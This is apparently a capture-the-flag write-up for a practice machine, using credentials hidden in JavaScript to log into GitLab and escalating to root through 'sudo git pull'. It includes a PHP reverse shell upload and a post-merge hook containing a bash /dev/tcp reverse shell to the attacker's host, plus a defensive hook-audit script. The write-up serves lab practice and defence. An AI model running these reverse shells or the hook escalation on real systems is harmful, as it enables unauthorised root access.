
Target IP: 10.10.10.114
Exploitation Summary
Initial Exploitation
- Vulnerability: Security through obscurity
- Explanation: Credentials are obscured in a JavaScript function within the website.
Privilege Escalation
- Vulnerability: sudo git pull
- Explanation: A post-merge hook script can be defined to execute code as root.
Enumeration
nmap -p- -A -T4 10.10.10.114

TCP 22: OpenSSH 7.6p1
TCP 80: nginx
Initial Shell Exploitation
Let’s check out the website

The home page redirects to the sign-in page. The bottom has 2 links of interest: Explore and Help.

The Explore link brings us to the Projects page, where we can see current projects, groups and snippets. Unfortunately, there’s no content here.

The Help page only has a bookmarks.html link that brings us to the following screen:

All links except Gitlab Login point to external sites. Hovering over the Gitlab Login link shows some JavaScript code containing a function with a variable defined inside it. To find out what the variable contains, we can use the browser's developer console:
- press F12
- click the Console tab
- paste only the variable portion of the JavaScript
- examine the variable _0x4b18

It looks like these are login credentials. The easiest way to use these credentials is to bookmark the link (right-click on the link):

Now go back to the login page and select the bookmarked link:

The credentials are populated into the sign-in form. How convenient. Of course, we can also simply type in the credentials ourselves. Now click on Sign In and we are successfully signed in to the application.

This GitLab instance lets us maintain our projects; essentially, we can upload any file to a project. So let’s prepare a PHP reverse shell using the following command. It uses IP address 10.10.14.34 and port 443, and names the file shell443.php.
cat /usr/share/webshells/php/php-reverse-shell.php | sed "s/127.0.0.1/10.10.14.34/g" | sed "s/1234/443/g" > shell443.php
It’s time to upload the file.
- navigate to project Profile
- click + icon
- select Upload file

- click to select file shell443.php
- click Upload file

The file should now be uploaded. Now make it available to the website.
- scroll down and click Submit merge request

- click Merge

The file is ready. Now use netcat to listen on port 443
nc -nvlp 443
And navigate to http://10.10.10.114/profile/shell443.php

Privilege Escalation
sudo -l

sudo -l is one of the first commands I use to determine whether the user can execute any commands as root. Sure enough, we are able to perform git pull.
It’s not immediately clear what we can do to escalate privileges. After some research on Google, I found a feature called git hooks. A git hook is basically a trigger that executes a custom script when a certain event or action occurs. A couple of good reads can be found at:
For git pull, a post-merge hook script can be used; it is triggered when a merge occurs.
To achieve that, we will create a local copy of the project Profile, then make some changes and perform a merge. Finally, running sudo git pull on the local copy will trigger the custom post-merge script defined in the local copy. Now, let’s put this into action.
Make a local copy
cd /tmp
cp -r /var/www/html/profile .
Modify shell443.php and perform a merge again
- click on shell443.php
- click Edit
- make some changes (any change will do)
- click Commit changes

- click Submit merge request
- click Merge (just like when we first uploaded the file)
Prepare the post-merge hook script
cd /tmp/profile/.git/hooks
echo '#!/bin/bash' > post-merge
echo 'bash -i >& /dev/tcp/10.10.14.34/4000 0>&1' >> post-merge
chmod 755 post-merge
This script, when executed, will connect back to the Kali machine on port 4000
Start a netcat listener on port 4000
nc -nvlp 4000
Perform git pull (final trigger)
cd /tmp/profile
sudo git pull


root shell obtained.
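The escalation works because git, when run as root, executes any executable post-merge hook present in the working copy it is run in. The following is an added example, not part of the original write-up, of a check that lists active hooks in a working copy before git is run there with elevated rights; the function name audit_git_hooks and its output format are assumptions of this example, and it reads only the repository-local config.

```shell
#!/bin/sh
# Added example: review active Git hooks in a working copy before git is run
# with elevated rights. Name and output format are assumptions of this example.
# Only the repository-local config is read; global/system config is not.

# Prints one line per finding. Returns 0 if clean, 1 on findings, 2 on bad input.
audit_git_hooks() {
    repo=$1
    gitdir="$repo/.git"
    [ -d "$gitdir" ] || { echo "not a git working copy: $repo" >&2; return 2; }
    findings=0

    # git also honours a redirected hooks directory (core.hooksPath).
    hooks_path=$(awk -F= 'tolower($1) ~ /^[ \t]*hookspath[ \t]*$/ {
        v = $2; sub(/^[ \t]+/, "", v); print v }' "$gitdir/config" 2>/dev/null |
        tail -n 1 || true)
    if [ -n "$hooks_path" ]; then
        echo "CONFIG core.hooksPath=$hooks_path"
        findings=$((findings + 1))
        case $hooks_path in
            /*) hooks_dir=$hooks_path ;;
            *)  hooks_dir="$repo/$hooks_path" ;;
        esac
    else
        hooks_dir="$gitdir/hooks"
    fi

    # git only runs hooks that are executable; shipped *.sample files are inert.
    for hook in "$hooks_dir"/*; do
        [ -f "$hook" ] || continue
        case $hook in *.sample) continue ;; esac
        if [ -x "$hook" ]; then
            owner=$(ls -ld "$hook" | awk '{print $3}')
            echo "HOOK $(basename "$hook") owner=$owner"
            findings=$((findings + 1))
        fi
    done

    [ "$findings" -eq 0 ]
}
```

Call it as audit_git_hooks /path/to/working-copy on the directory a sudo rule for git would operate in; a non-zero exit means a hook or a redirected hooks path needs review first.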
Loot
We got both user & root flags after rooting the box.


Thank you for the box, Frey & thek.